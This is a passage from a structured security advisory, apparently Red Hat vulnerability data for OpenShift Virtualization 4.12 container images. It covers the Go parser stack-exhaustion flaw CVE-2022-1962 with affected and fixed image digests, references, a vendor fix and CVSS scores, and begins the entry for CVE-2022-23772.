Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-1962", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107376", }, ], notes: [ { category: "description", text: "A flaw was found in the golang standard library, go/parser. When calling any Parse functions on the Go source code, which contains deeply nested types or declarations, a panic can occur due to stack exhaustion. This issue allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: go/parser: stack exhaustion in all Parse* functions", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1962", }, { category: "external", summary: "RHBZ#2107376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1962", url: "https://www.cve.org/CVERecord?id=CVE-2022-1962", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1962", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1962", }, { category: "external", summary: "https://go.dev/issue/53616", url: "https://go.dev/issue/53616", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 5.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: go/parser: stack exhaustion in all Parse* functions", }, { cve: "CVE-2022-23772", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", 